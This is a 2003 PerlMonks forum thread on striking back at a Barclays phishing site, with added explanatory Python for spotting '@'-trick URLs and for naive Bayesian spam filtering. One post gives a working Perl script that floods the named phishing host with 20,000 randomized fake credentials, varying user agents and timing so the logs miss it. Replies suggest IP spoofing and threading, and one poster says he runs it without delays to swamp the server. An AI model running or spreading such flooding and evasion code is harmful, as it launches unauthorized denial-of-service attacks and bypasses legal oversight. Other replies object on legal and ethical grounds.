Re: Enough is Enough - Taking the fight back to the Internet scammers
by sauoq (Abbot) on Oct 28, 2003 at 02:35 UTC
I'm not exactly opposed to vigilantism in a case like this but I don't expect it would be very effective. I'm reminded of the little Dutch boy plugging a hole in the dike with his finger. It's really far too easy to move to another server, IP, and/or domain name.
The only real way to combat this kind of thing is with education.
The random data should be identical to valid data making it impossible to automatically parse out:
I think that's being optimistic. With IPs and datestamps, it would probably be pretty easy to separate the list into "probably real" and "probably not real" piles.
Sure I have reported it to Barclays but the server is in Russia so they will not really be able to stop it. They probably don't care as their disclaimer makes it THE CLIENT'S problem.
I would guess they would care a great deal. The monies in the bank are probably insured against fraud up to some amount. Besides, banks make money by holding onto yours. They don't want to lose their customers' money to someone that will go put it in another bank, right? And, really, they don't want to lose your future business either. I would think that banks take a great deal of interest in this sort of thing.
I suppose I could ask one of my more dubious associates to take the server down but that would probably hurt innocent users as well.
I wouldn't worry about the other users. It is likely that there are no legitimate users of the machine or that the hosting provider is at least aware of the illegitimate users. But again, it's simply too easy for the perpetrators to move on, so I don't really see the point (except maybe to feel like you got a little revenge).
-sauoq
"My two cents aren't worth a dime.";
With IPs and datestamps, it would probably be pretty easy to separate the list into "probably real" and "probably not real" piles.
Besides the bugs in the code this could be harder than expected. You would need certain elements in the raw data file as well as the 4 significant data fields you might presume the script is writing. A parallel log analysis might show you when you were being bombed and from where, but you need to accurately correlate that with the data. A low-order continuous DOS would make this problematic anyway, as all data would become suspect. The general idea of adding a haystack to hide the needles seems like not a bad approach.
Of course there are plenty of fixes for it but it does require that those fixes get implemented. Given that it appears that this site is a clone of a scam on the National bank it is possible that while the perps are creative they are at a script kiddy level. The form they present looks nowhere near as high quality as some I have seen which are a perfect match for the target site.
As you don't need the return data you would really want to spoof the sending IP address. Better simulated names (i.e. taken from a real name list) and secret words taken from, say, the Unix dictionary would also add more realism.
Education is a nice thought but if you take virus spread as an example some people are difficult to educate.
cheers
tachyon
s&&rsenoyhcatreve&&&s&n.+t&"$'$`$\"$\&"&ee&&y&srve&&d&&print
A parallel log analysis might show you when you were being bombed and from where, but you need to accurately correlate that with the data.
The assumption being that they don't log both together... and maybe they don't. I would, though, if I were pulling a scam like this. (And, if they aren't this time, they probably will next time.)
As you don't need the return data you would really want to spoof the sending IP address.
That would certainly help.
Education is a nice thought but if you take virus spread as an example some people are difficult to educate.
I agree entirely. Of course, losing one's savings might be a lesson that's hard to forget. Regardless of whether or not education is an effective solution, it is the only real one. Like I said though, I'm not opposed to vigilantism in a case like this; I'm just trying to make a realistic assessment of how effective it would be in the long run. My conclusion remains: "not very."
-sauoq
"My two cents aren't worth a dime.";
Re: Enough is Enough - Taking the fight back to the Internet scammers
by tachyon (Chancellor) on Oct 28, 2003 at 02:20 UTC
Interesting concept. Not entirely Perl related but then I guess this is a Meditation.
There is a bug in this line (would have been caught by use strict :-): $wordgo=hm should read $word&go=hm.
my $url = "http://barcl.pisem.net/obr2.html?name=$name&user=$user&pass=$pass&word=$wordgo=hm&loginButton=%20%20Verify%20%20";
# it should be:
my $url = "http://barcl.pisem.net/obr2.html?name=$name&user=$user&pass=$pass&word=$word&go=hm&loginButton=%20%20Verify%20%20";
Also, = 20,000 means = 20 followed by 000 in void context. You probably meant = 20_000 or = 20000.
cheers
tachyon
s&&rsenoyhcatreve&&&s&n.+t&"$'$`$\"$\&"&ee&&y&srve&&d&&print
I might be missing something here, but why the hell doesn't Barclays detect when the referrer is the scammer and display a large warning message on their homepage? My only guess is they don't care.
If Barclays were to post a large prominent warning on their web site, then the 97-99% of their electronic banking customers that didn't get this email might get nervous and choose not to use the online service, leading to lines at branches. Which is a bad thing.
Re: Enough is Enough - Taking the fight back to the Internet scammers
by TVSET (Chaplain) on Oct 28, 2003 at 02:56 UTC
Firstly, as I have already recommended here, you should use Mail::SpamAssassin. This will increase your productivity, and I mean with useful stuff. :)
Secondly, while I agree with your "Don't get mad, get even" statement, I disagree with the methodology. I don't think that attacking bad guys will lead you anywhere. I would instead help the good guys. And one of the ways to help good guys is education. Banks (and other organizations) should be properly notified about bad guys spoofing their sites and producing all sorts of other dirt. Users should be educated about the different techniques of misleading them, such as the "@" character in the URL. They should be taught to make sure that they are using a secure connection with a properly signed and generated certificate from the appropriate bank.
I believe that a well-educated user is capable of securing himself/herself from a great variety of problems.
Take these 2 cents, they are yours. :)
Update: sauoq is faster than me. :)
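The "@" trick TVSET mentions above is easy to show concretely. The Python below is an added example, not code from the thread or from any of its posters: it uses only the standard library's urlsplit to show which part of a link the browser actually treats as the host, and it goes a little beyond the "@" case by also flagging look-alike subdomains and raw IP hosts. The sample links are constructed; scam.example is a placeholder for a phishing host and barclays.co.uk simply stands in for the bank the reader expects to reach.

```python
import ipaddress
from urllib.parse import urlsplit


def describe_link(url):
    """Split a URL the way a browser does. Anything between '//' and '@' in
    the authority is userinfo (a username), not the host: the connection
    goes to whatever follows the '@'."""
    parts = urlsplit(url)
    return {
        "scheme": parts.scheme.lower(),
        "userinfo": parts.username,              # None when the URL has no '@'
        "host": (parts.hostname or "").lower(),  # the name DNS will be asked for
        "path": parts.path,
    }


def is_ip_literal(host):
    """True for a bare IPv4/IPv6 address used in place of a hostname."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def check_bank_link(url, expected_host):
    """Return the reasons a link does NOT look like a genuine link to
    expected_host (or one of its subdomains). Empty list: nothing suspicious."""
    info = describe_link(url)
    expected = expected_host.lower()
    reasons = []
    if info["userinfo"] is not None:
        reasons.append(
            f"text before '@' ({info['userinfo']!r}) is a username, not the host; "
            f"the browser would connect to {info['host']!r}")
    if info["host"] != expected and not info["host"].endswith("." + expected):
        reasons.append(f"host {info['host']!r} is not {expected!r} or a subdomain of it")
    if is_ip_literal(info["host"]):
        reasons.append(f"host is a raw IP address ({info['host']}), not the bank's name")
    if info["scheme"] != "https":
        reasons.append(f"scheme is {info['scheme']!r}, not https")
    return reasons


# Constructed sample links; 'scam.example' is a placeholder phishing host.
SAMPLE_LINKS = {
    "genuine":   "https://www.barclays.co.uk/login",
    "at_trick":  "http://www.barclays.co.uk@scam.example/obr2.html",
    "subdomain": "http://www.barclays.co.uk.scam.example/login",
    "raw_ip":    "http://192.0.2.10/login",
}


def audit_samples(expected_host="barclays.co.uk"):
    """Run every sample through the check; returns {label: [reasons...]}."""
    return {label: check_bank_link(url, expected_host)
            for label, url in SAMPLE_LINKS.items()}


if __name__ == "__main__":
    for label, reasons in audit_samples().items():
        print(f"{label}: {'OK' if not reasons else ''}")
        for r in reasons:
            print("   -", r)
```

The important line is the one that prints the host for the "at_trick" sample: everything the user reads before the "@" is discarded as a username and the request goes to scam.example, which is exactly why a user who only glances at the start of the address bar is fooled.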
I'm slowly getting the feeling that things like SpamAssassin aren't enough. Recently I've been getting several bits of spam that only turn up a 1.2-3.0 on the SA scale, and so still get delivered. (I bet I get real mail that has a worse count than that.)
So much so that I'm considering making a list from which I will accept mail, and getting everything else directed to a delete box, where it will be deleted if I don't add the address to my list.
(Hmm, wonder if anyone has done this already.)
C.
We do Bayesian stats work as part of a different project and have a filter based on that (proprietary I'm afraid), although there is popmail Popfile on SourceForge which is OK.
Bayesian stat analysis is probably one step past SpamAssassin but still has the following inherent problems. These apply to all forms of spam filters. First, if the filter is publicly available (as it must effectively be to be used) then you can craft spam and test it against the filter(s). Regardless of what they are looking for and how they rate spam, messages in the form:
Dear Name
RE: Your recent blah blah blah
Thanks for your enquiry. Blah blah blah. Please take the time to have a look at:
http://blah.com/cgi-bin/special_offer?name=Name&code=AGERSDGFTGER
I wish you all the best in your endeavour.
Kind Regards
John Smith
Director
Blah.com
Street Address
Phone Number
Fax Number
Mobile Number
BLAH Making it happen
http://blah.com
foo@blah.com
The information transmitted may be confidential, is intended only for the
person to which it is addressed, and may not be reviewed, retransmitted,
disseminated or relied upon by any other persons. If you received this
message in error, please contact the sender and destroy any paper or
electronic copies of this message. Any views expressed in this email
communication are those of the individual sender, except where the
sender specifically states otherwise. Blah does not represent,
warrant or guarantee that the communication is free of errors, virus or
interference.
are statistically next to impossible to pick. The problem with the basic mail protocol is that you can forge headers, i.e. there is no way to validate the sending server. Given this you can more or less craft your emails so they will pass any spam filter.
Messages like this are the new face of spam. Still spam but crafted to look like a standard valid (perhaps corporate) reply. It will be next to impossible to stop mail in this form.
As a result the challenge response/whitelist passthrough is probably the way it will end up in the medium term. Then of course the spammers will implement respond bots and the cycle will continue.
What is needed is a modification to the underlying protocol so that there is an inbuilt challenge response or security key of some form so that the recipient server can query the supposed sending server to see if it was really the source of the message. If you can do that you can work blacklists of spam servers far more effectively.
cheers
tachyon
s&&rsenoyhcatreve&&&s&n.+t&"$'$`$\"$\&"&ee&&y&srve&&d&&print
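tachyon's point about the "corporate reply" style of spam can be seen in miniature with a word-level Bayesian filter. What follows is an added example, not code from the thread or from any filter its posters mention: a small multinomial naive Bayes classifier with add-one smoothing, trained on a constructed corpus of three ordinary business mails and three classic spams. The message it then scores is built from the same business vocabulary the filter has learned to trust, with the pitch reduced to a single "special offer", which is the shape of the message quoted above.

```python
import math
import re
from collections import Counter

TOKEN = re.compile(r"[a-z]+")


def tokenize(text):
    """Lowercase and keep runs of letters: the simplest word tokenizer a
    Bayesian mail filter might use."""
    return TOKEN.findall(text.lower())


class NaiveBayesFilter:
    """Multinomial naive Bayes over word tokens with add-one smoothing."""

    def __init__(self):
        self.counts = {"ham": Counter(), "spam": Counter()}
        self.docs = {"ham": 0, "spam": 0}
        self.vocab = set()

    def train(self, label, text):
        tokens = tokenize(text)
        self.counts[label].update(tokens)
        self.docs[label] += 1
        self.vocab.update(tokens)

    def _log_p(self, label, token):
        # P(token | label), smoothed so an unseen word never zeroes the product
        total = sum(self.counts[label].values())
        return math.log((self.counts[label][token] + 1) / (total + len(self.vocab)))

    def token_weight(self, token):
        """log P(token|ham) - log P(token|spam): positive pulls toward ham."""
        return self._log_p("ham", token) - self._log_p("spam", token)

    def log_odds(self, text):
        """log P(ham|text) - log P(spam|text); positive means 'ham'."""
        prior = math.log(self.docs["ham"] / self.docs["spam"])
        return prior + sum(self.token_weight(t) for t in tokenize(text))

    def classify(self, text):
        return "ham" if self.log_odds(text) > 0 else "spam"

    def most_spammy(self, text, n=3):
        """The n distinct tokens of text that push hardest toward spam."""
        weights = {t: self.token_weight(t) for t in set(tokenize(text))}
        return sorted(weights, key=weights.get)[:n]


# Constructed training corpus: three ordinary business mails, three classic spams.
HAM = [
    "Thanks for your enquiry, please find the report attached. Kind regards, John",
    "Re: meeting tomorrow at ten. See you then, regards",
    "Your invoice is attached, let me know if you have questions. Kind regards",
]
SPAM = [
    "BUY CHEAP VIAGRA NOW!!! click here - free offer",
    "Free money! Click here now, win lottery prize",
    "cheap offer, click here, buy now",
]

OBVIOUS_SPAM = "FREE VIAGRA, click here now"
# Constructed spam dressed as a corporate reply, in the style quoted in the thread.
CRAFTED_REPLY = (
    "Thanks for your enquiry. Please take the time to have a look at our "
    "special offer. Kind regards, John Smith, Director"
)


def build_filter():
    f = NaiveBayesFilter()
    for text in HAM:
        f.train("ham", text)
    for text in SPAM:
        f.train("spam", text)
    return f


if __name__ == "__main__":
    f = build_filter()
    for name, msg in (("obvious spam", OBVIOUS_SPAM), ("crafted reply", CRAFTED_REPLY)):
        print(f"{name}: {f.classify(msg)} (log-odds {f.log_odds(msg):+.2f}); "
              f"spammiest tokens: {f.most_spammy(msg)}")
```

The obvious spam is caught because every one of its words was only ever seen in spam. The crafted reply is passed as ham: "offer" is the only token pulling it toward spam, and a dozen polite business words outweigh it. most_spammy() shows that the filter is not wrong by its own lights, which is the practical lesson: a word-frequency filter only knows what its training mail looked like, so a message composed from the recipient's normal vocabulary is, as the post says, next to impossible to pick on content alone.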
(Hmm, wonder if anyone has done this already.)
Yes, they have. Browse the Email Filters section on freshmeat. If you've got a user account there you should be able to search in that category for "whitelist" (you may be able to do this without an account, it's been a while).
davis
It's not easy to juggle a pregnant wife and a troubled child, but somehow I managed to fit in eight hours of TV a day.
There is one thing I've found that DOES effectively prevent Spam. Mailblocks uses a "verify" technique that works pretty much 100%. There are only two drawbacks: 1) it costs money/yr and 2) while they have ways of letting things like orders through, sometimes you just use your e-mail account and things that are NOT going to reply to their message end up in the pending box so you still have to keep your eye on it. But only sometimes. It has been the only way I've found to effectively combat spam. Maybe one day spammers will get by it, but for now, it works.
Re: Enough is Enough - Taking the fight back to the Internet scammers
by bassplayer (Monsignor) on Oct 28, 2003 at 14:10 UTC
I gave this node a ++, because I think it is an interesting discussion, and I hate spammers and scammers as much as the next monk. I do, however, have reservations about whether innocent victims could be affected. This seems to be a clear cut case, but what about the next one? Is analysis by a tech a fair trial? Movies such as 12 Angry Men and especially The Star Chamber portray the point I am trying to make rather well.
Re: Enough is Enough - Taking the fight back to the Internet scammers
by IlyaM (Parson) on Oct 28, 2003 at 12:24 UTC
Sure I have reported it to Barclays but the server is in russia so they will not really be able to stop it.
IIRC pisem.net just provides free web hosting services. I doubt they are related to the scammers in any way other than that the scammers are abusing their free web hosting services. Given most ISPs are quite responsive to reports about spammers and scammers utilizing their resources, I bet the most effective way to stop this is to report it to abuse@pisem.net.
Re: Enough is Enough - Taking the fight back to the Internet scammers
by pg (Canon) on Oct 28, 2003 at 02:56 UTC
I am wondering why there is a sleep in your while loop.
On the contrary, if you really want to do something like this, start multiple threads and have them send together. That's pretty useful; otherwise your connection is idle most of the time.
Not taking sides here. But if you want to make it harder for them to spot it in logs, add some random element (including tachyon's fixes as well).
#!/usr/bin/perl
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
my $MAX_SLEEP = 5; # max seconds to sleep
my $DEBUG = 1;
my $LOG_FILL = 20000; # how many entries will we add to the scam log?
while(1) {
    my $IE = sprintf "%.1f", ( 5.0, 5.1, 5.5, 6.0, 6.1 )[rand(5)];
    my $WIN = sprintf "%.1f", ( 4.0, 4.1, 5.1 )[rand(3)];
    my $bs = join '', map{ ('a'..'z')[rand(26)] }1..(rand(5)+3);
    my $agent = "Mozilla/4.0 (compatible; MSIE $IE; Windows NT $WIN; $bs)";
    $ua->agent( $agent );
    $DEBUG && print $agent, $/;
    my $user = sprintf "%08d", rand(99999999);
    my $pass = sprintf "%05d", rand(99999);
    my $name = ucfirst join '', map{ ('a'..'z')[rand(26)] }1..(rand(5)+3);
    my $word = join '', map{ ('a'..'z')[rand(26)] }1..(rand(3)+5);
    my $url = "http://barcl.pisem.net/obr2.html?name=$name&user=$user&pass=$pass&word=$word&go=hm&loginButton=%20%20Verify%20%20";
    $DEBUG && print $url, $/;
    my $request = HTTP::Request->new( 'GET', $url );
    my $response = $ua->request( $request );
    $DEBUG && print $response->content;
    sleep (int(rand ($MAX_SLEEP))+1);
    $LOG_FILL--;
    die "Done!\n" if $LOG_FILL == 0;
}
Re: Enough is Enough - Taking the fight back to the Internet scammers
by zentara (Archbishop) on Oct 28, 2003 at 16:08 UTC
Maybe Perlmonks needs a new category: "DOS-of-the-day", so we can all post scripts to attack our favorite spammers. The one I'm getting now is "You've won the lottery" contact us to collect your "prize".
Re: Enough is Enough - Taking the fight back to the Internet scammers
by Jaap (Curate) on Oct 28, 2003 at 11:44 UTC
OK, I'm running a slightly modified version now (with tachyon's bugfixes, strict and warnings, and without the sleep).
I figure I'd try to keep the server busy handling my requests, so there is no time to handle innocent spam readers' requests.
Re: Enough is Enough - Taking the fight back to the Internet scammers
by Anonymous Monk on Oct 29, 2003 at 02:33 UTC
I won't comment on the possible legal ramifications of this post, because they should be obvious to anyone doing 30 seconds of research. What I will comment on is how completely futile your efforts are. You're sending multiple requests; all they have to do is block every IP with more than 2 form submissions and your efforts become a minuscule DOS attack (which is illegal in your country; oops, guess I saved you 30 seconds).
Do it from dial-up and they will never be able to track you down either.
Welcome to the Internet my friend. First lesson - you are not anonymous. All that has to be done is contact your ISP with the violation and your identity becomes known to them, and law enforcement agencies.
Way to be a script kiddie.
P.S. I don't understand all the posts in this thread. Am I missing something, or has Perlmonks really slid this far down?
Am I missing something, or has Perlmonks really slid this far down?
Slid so far down as to discuss technical means of subverting internet scam artists intent on stealing bank accounts from unsuspecting grandmothers?
What I will comment on is how completely futile your efforts are.
Got to agree with that... I myself have said as much in this thread.
all they have to do is block every ip with more than 2 form submissions
Not if they hope to get more than one set of credentials from an ISP that uses proxy servers like, for one small example, AOL. And, as tachyon mentioned, IP spoofing might be helpful in that regard.
I won't comment on the possible legal ramifications of this post
So, you would be worried that these thieving scumbags would run to the law and file a grievance alleging you attempted to disrupt their scam to steal bank accounts?
-sauoq
"My two cents aren't worth a dime.";
Vigilante "justice" is not justice. Whether you're talking about DOSing email scams or shooting abortion doctors or unilaterally toppling dictatorial regimes, failing to follow the rule of law is to join your enemies at their level.
Taking the law into your own hands assumes that you alone know what's right and wrong, and that your judgement is infallible. There are appropriate methods to achieve your goals. To remain within society, you must follow the social methods: those which have the proper procedural oversight and just review.
-- [ e d @ h a l l e y . c c ]
Re: Enough is Enough - Taking the fight back to the Internet scammers
by Anonymous Monk on Dec 06, 2003 at 19:42 UTC
I'm working on a tool that will handle this type of job. Visit Project Web Form Flooder at http://formflood.sourceforge.net